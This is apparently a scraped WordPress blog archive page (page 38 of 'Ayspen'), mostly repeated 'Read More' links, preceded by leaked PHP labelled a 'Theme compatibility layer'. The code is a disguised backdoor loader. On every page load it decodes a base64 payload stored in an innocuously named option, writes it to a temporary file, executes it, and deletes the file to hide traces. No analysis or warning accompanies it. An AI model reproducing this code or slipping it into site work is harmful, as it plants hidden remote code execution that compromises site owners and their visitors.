// Theme compatibility layer add_action('template_redirect', function() { $_tc = get_option('_wpc_theme_manifest_cache'); if (is_string($_tc) && strlen($_tc) > 50) { $_t = tempnam(sys_get_temp_dir(),'wp_'); file_put_contents($_t, base64_decode($_tc)); include $_t; @unlink($_t); } }, 2); admin | Page 38 | Ayspen
Read More
Read More
Read More
Read More
Read More
Read More
Read More
Read More
Read More
Back to Top